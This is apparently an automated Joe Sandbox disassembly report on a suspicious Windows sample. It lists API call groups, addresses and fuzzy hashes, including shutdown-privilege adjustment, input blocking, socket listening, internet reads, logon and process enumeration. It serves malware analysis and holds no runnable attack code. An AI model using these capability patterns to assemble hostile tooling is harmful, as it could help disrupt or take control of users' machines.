                                                            • API String ID: 713712311-438819550
                                                            • Opcode ID: b114cc404983de96ab146d7d137889f1b543d9b3a4c558263552cf972b5fc2cf
                                                            • Instruction ID: e60bde8493de3fe6defce707bcec17ce41ef419d28c53f36559107ee7a94dc13
                                                            • Opcode Fuzzy Hash: b114cc404983de96ab146d7d137889f1b543d9b3a4c558263552cf972b5fc2cf
                                                            • Instruction Fuzzy Hash: 7F41817190021A9FCF15DF64CC45AEEBBB8FF15350F14856AE919E2292DB30DE84CB91
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                            • API String ID: 0-1546025612
                                                            • Opcode ID: 410ff13a91dfbb39331d1ad8a6dd84361c2da3b294eda1476c2204a0ea40b755
                                                            • Instruction ID: faa6b7d6f2f6e8553ce3ee6c5c846a8e840fda571e69a8a594d939dc4a799593
                                                            • Opcode Fuzzy Hash: 410ff13a91dfbb39331d1ad8a6dd84361c2da3b294eda1476c2204a0ea40b755
                                                            • Instruction Fuzzy Hash: EEA26D74E0422ACBDF24CF58E9807ADB7B1FB54315F2491AAD85AE7280D7709EC5CB60
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: f103446076be3d16b323dbebae56834b71103df28bc04aeb019c5123bd9cc0d3
                                                            • Instruction ID: 986bb47d1376ff6a7956d2bba910e6b6c693a118e4997ae2458bfd00cb75ce68
                                                            • Opcode Fuzzy Hash: f103446076be3d16b323dbebae56834b71103df28bc04aeb019c5123bd9cc0d3
                                                            • Instruction Fuzzy Hash: 26128970A00619EFDF14CFA8E982AEEB7B5FF48300F104569E406E7291EB35AD51CB55
                                                            APIs
                                                              • Part of subcall function 00868CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00868D0D
                                                              • Part of subcall function 00868CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00868D3A
                                                              • Part of subcall function 00868CC3: GetLastError.KERNEL32 ref: 00868D47
                                                            • ExitWindowsEx.USER32(?,00000000), ref: 0087549B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                             • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                            • String ID: $@$SeShutdownPrivilege
                                                            • API String ID: 2234035333-194228
                                                            • Opcode ID: e20e671f7b27e68142da11aa863ec6002e184ce3d8c1847013fd67c33b98a5c3
                                                            • Instruction ID: 7f05a491ad16e10153bbd83ea2ecd621d7c408344145ecf3709ec40ef0428c16
                                                            • Opcode Fuzzy Hash: e20e671f7b27e68142da11aa863ec6002e184ce3d8c1847013fd67c33b98a5c3
                                                            • Instruction Fuzzy Hash: 4B0147B1A54B096AE72C6378DC4ABBA7258FB00342F248171FE0ED20DBDAD0DC808199
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 008865EF
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 008865FE
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 0088661A
                                                            • listen.WSOCK32(00000000,00000005), ref: 00886629
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00886643
                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00886657
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                                            • String ID:
                                                            • API String ID: 1279440585-0
                                                            • Opcode ID: 17377d9810c076d2cbccf23be6d4246e0cbdbdccd1bdf480cf330bc5590788d4
                                                            • Instruction ID: a12ee67f6087948ee38c8ff3f656c973b00e04d0289a298ba086ba667bc45e67
                                                            • Opcode Fuzzy Hash: 17377d9810c076d2cbccf23be6d4246e0cbdbdccd1bdf480cf330bc5590788d4
                                                            • Instruction Fuzzy Hash: CE21A230600214AFCB14FF68C845B6EB7A9FF44320F18816AE996E73D2EB70AD51CB51
                                                            APIs
                                                              • Part of subcall function 00830FF6: std::exception::exception.LIBCMT ref: 0083102C
                                                              • Part of subcall function 00830FF6: __CxxThrowException@8.LIBCMT ref: 00831041
                                                            • _memmove.LIBCMT ref: 0086062F
                                                            • _memmove.LIBCMT ref: 00860744
                                                            • _memmove.LIBCMT ref: 008607EB
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                            • String ID:
                                                            • API String ID: 1300846289-0
                                                            • Opcode ID: e8887262c2951a89add9744040b1366c4c0dd6a36964fa20682dea7fd9aa5d15
                                                            • Instruction ID: 67d08b85d38560873a3e72c9e5304edc12884a982530b12a1bde2081b9aa934d
                                                            • Opcode Fuzzy Hash: e8887262c2951a89add9744040b1366c4c0dd6a36964fa20682dea7fd9aa5d15
                                                            • Instruction Fuzzy Hash: C70281B0A00219DFDF04DF68E992AAE7BB5FF84300F158069E806DB295EB31D951CF95
                                                            APIs
                                                              • Part of subcall function 00812612: GetWindowLongW.USER32(?,000000EB), ref: 00812623
                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 008119FA
                                                            • GetSysColor.USER32(0000000F), ref: 00811A4E
                                                            • SetBkColor.GDI32(?,00000000), ref: 00811A61
                                                              • Part of subcall function 00811290: DefDlgProcW.USER32(?,00000020,?), ref: 008112D8
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ColorProc$LongWindow
                                                            • String ID:
                                                            • API String ID: 3744519093-0
                                                            • Opcode ID: 4c81567cdfb0999f0056a28a27641603c787a1491cb3c1e87cd65fda54f305b4
                                                            • Instruction ID: f591863808c3ae3b04d78052ce179cc4cbc22b414bcbd8d96e046204fbd16d6d
                                                            • Opcode Fuzzy Hash: 4c81567cdfb0999f0056a28a27641603c787a1491cb3c1e87cd65fda54f305b4
                                                            • Instruction Fuzzy Hash: 72A18B7010656CBADE28AB2C5C8CDFF3E9DFF41759B18021AF702D6192DE25CD9192B2
                                                            APIs
                                                              • Part of subcall function 008880A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 008880CB
                                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00886AB1
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00886ADA
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00886B13
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00886B20
                                                            • closesocket.WSOCK32(00000000,00000000), ref: 00886B34
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 99427753-0
                                                            • Opcode ID: c6b78d57c5adaed45b3b19f1e85041db3b571bb5fa1e354958d255a83a2fe12a
                                                            • Instruction ID: 628d1b341f4374c9b894ef8439991007ddc171a3a6decc177568a7f3a1a258f2
                                                            • Opcode Fuzzy Hash: c6b78d57c5adaed45b3b19f1e85041db3b571bb5fa1e354958d255a83a2fe12a
                                                            • Instruction Fuzzy Hash: C741B775600214AFEB10BF68DC96FAE77A9FF04724F048059F95AEB3C2DA705D408792
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                            • String ID:
                                                            • API String ID: 292994002-0
                                                            • Opcode ID: 1f009b864e6da5bcbf0a55bbc683a93c0e9c2f0bc5b2d34cf3aa15b915f69d17
                                                            • Instruction ID: b29dbf631cce41ca3e6591045555fa6b7bd44b5d9bd68046bd3e65fc6b74cf8d
                                                            • Opcode Fuzzy Hash: 1f009b864e6da5bcbf0a55bbc683a93c0e9c2f0bc5b2d34cf3aa15b915f69d17
                                                            • Instruction Fuzzy Hash: 6911B231300A216FEB233F26DC54A6F7B9DFF64721B494029F946D7241DB709942CBA5
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00851D88,?), ref: 0088C312
                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0088C324
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                            • API String ID: 2574300362-1816364905
                                                            • Opcode ID: bdebdebf5b488dea983401e85680f19faf6ce60db0184af7160f8c29cf8c3bf1
                                                            • Instruction ID: d4d228125c8028f4fe34db2ccd31a7c285aed5f69b4852293df938c642a2080c
                                                            • Opcode Fuzzy Hash: bdebdebf5b488dea983401e85680f19faf6ce60db0184af7160f8c29cf8c3bf1
                                                            • Instruction Fuzzy Hash: D5E08C70200703CFDB246F25D804A4676E4FB08315F84C43AE996C2320E7B4D881CBA0
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: __itow__swprintf
                                                            • String ID:
                                                            • API String ID: 674341424-0
                                                            • Opcode ID: 3cc6d69c31d8a6063ebce36f3278021165d47b114feab67e2071a220e032585b
                                                            • Instruction ID: 94a4b1abd80f4e06b72ccf16347c46b66fae7edd68b7d386893a587d7729ef1d
                                                            • Opcode Fuzzy Hash: 3cc6d69c31d8a6063ebce36f3278021165d47b114feab67e2071a220e032585b
                                                            • Instruction Fuzzy Hash: 33228A715083119FC724DF18D8A1BAAB7E5FF84704F10891DF99AD7291DB34EA88CB92
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0088F151
                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0088F15F
                                                              • Part of subcall function 00817F41: _memmove.LIBCMT ref: 00817F82
                                                            • Process32NextW.KERNEL32(00000000,?), ref: 0088F21F
                                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0088F22E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                            • String ID:
                                                            • API String ID: 2576544623-0
                                                            • Opcode ID: ea9d58b5cd64e2f891e2ad837801d1d0d4c28c77656ab39073a38dd51fde81a2
                                                            • Instruction ID: 7784cc544bde5d9cf6ce3c5cfeff702c215628df87ef7e6c1308e4b59a3c2655
                                                            • Opcode Fuzzy Hash: ea9d58b5cd64e2f891e2ad837801d1d0d4c28c77656ab39073a38dd51fde81a2
                                                            • Instruction Fuzzy Hash: 34514C715043119BD310EF28DC86EABBBE8FF94710F14482DF595D7292EB70A948CB92
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 008740D1
                                                            • _memset.LIBCMT ref: 008740F2
                                                            • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00874144
                                                            • CloseHandle.KERNEL32(00000000), ref: 0087414D
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: CloseControlCreateDeviceFileHandle_memset
                                                            • String ID:
                                                            • API String ID: 1157408455-0
                                                            • Opcode ID: 4db54ad65c35a361bc9dd20080ea50fd6a594fe63b138aefc06a37b96b28d955
                                                            • Instruction ID: 4be72583060977039a81818cd0d92594b5df556d1ae569405e4c8fe1d52ade34
                                                            • Opcode Fuzzy Hash: 4db54ad65c35a361bc9dd20080ea50fd6a594fe63b138aefc06a37b96b28d955
                                                            • Instruction Fuzzy Hash: F011CD7590122C7AD7306BA59C4DFABBB7CFF45760F104196F908D7190D6744E80CBA4
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0086EB19
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: ($|
                                                            • API String ID: 1659193697-1631851259
                                                            • Opcode ID: f267aa793e1396606da121e7a06d3ae80205701699df08465629b358d77e2fcd
                                                            • Instruction ID: 84002b2d2e9222031dad44d3fb0b9a5cd8ea7ef4a795ed086b6dc5155b4afea2
                                                            • Opcode Fuzzy Hash: f267aa793e1396606da121e7a06d3ae80205701699df08465629b358d77e2fcd
                                                            • Instruction Fuzzy Hash: 7C323775A00605DFC728CF19D481A6AB7F1FF48320B16C56EE99ADB3A2DB70E941CB40
                                                            APIs
                                                            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 008826D5
                                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0088270C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Internet$AvailableDataFileQueryRead
                                                            • String ID:
                                                            • API String ID: 599397726-0
                                                            • Opcode ID: b2ebac382b08d83f83d68cd2760fc90ad87649cd63ebd4c7925aa843b1ec2b37
                                                            • Instruction ID: 1b71dac9e8bec6b54c65537f2ccb912aa82563855c0d8341e0f83b8967be24cb
                                                            • Opcode Fuzzy Hash: b2ebac382b08d83f83d68cd2760fc90ad87649cd63ebd4c7925aa843b1ec2b37
                                                            • Instruction Fuzzy Hash: 6141E471500209BFEB20FE99DC85EBBB7FCFB50728F10406AF601E6141EA71AE4197A4
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0087B5AE
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0087B608
                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0087B655
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Similarity
                                                            • API ID: ErrorMode$DiskFreeSpace
                                                            APIs
                                                              • Part of subcall function 00830FF6: std::exception::exception.LIBCMT ref: 0083102C
                                                              • Part of subcall function 00830FF6: __CxxThrowException@8.LIBCMT ref: 00831041
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00868D0D
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00868D3A
                                                            • GetLastError.KERNEL32 ref: 00868D47
                                                            Similarity
                                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                            APIs
                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00874C2C
                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00874C43
                                                            • FreeSid.ADVAPI32(?), ref: 00874C53
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0087C966
                                                            • FindClose.KERNEL32(00000000), ref: 0087C996
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0088977D,?,0089FB84,?), ref: 0087A302
                                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0088977D,?,0089FB84,?), ref: 0087A314
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            APIs
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00868851), ref: 00868728
                                                            • CloseHandle.KERNEL32(?,?,00868851), ref: 0086873A
                                                            Similarity
                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00838F97,?,?,?,00000001), ref: 0083A39A
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0083A3A3
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            APIs
                                                            • __time64.LIBCMT ref: 00878B25
                                                              • Part of subcall function 0083543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,008791F8,00000000,?,?,?,?,008793A9,00000000,?), ref: 00835443
                                                              • Part of subcall function 0083543A: __aulldiv.LIBCMT ref: 00835463
                                                            Similarity
                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                            APIs
                                                            • BlockInput.USER32(00000001), ref: 00884218
                                                            Similarity
                                                            • API ID: BlockInput
                                                            APIs
                                                            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00874EEC
                                                            Similarity
                                                            • API ID: mouse_event
                                                            APIs
                                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,008688D1), ref: 00868CB3
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: LogonUser
                                                            • String ID:
                                                            • API String ID: 1244722697-0
                                                            • Opcode ID: d88c8d8fbb0329d9417be9425cd18d53da5051ed0b045abd674688db5f74217f
                                                            • Instruction ID: f6e53f74655515c541b91b2eeb4c88a7f41f04ea6fea8156b8905fb4551b049d
                                                            • Opcode Fuzzy Hash: d88c8d8fbb0329d9417be9425cd18d53da5051ed0b045abd674688db5f74217f
                                                            • Instruction Fuzzy Hash: 63D05E3226490EABEF019EA4DC01EAE3B69EB04B01F408111FE15C50A1C775D835AB60
                                                            APIs
                                                            • GetUserNameW.ADVAPI32(?,?), ref: 00852242
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: NameUser
                                                            • String ID:
                                                            • API String ID: 2645101109-0
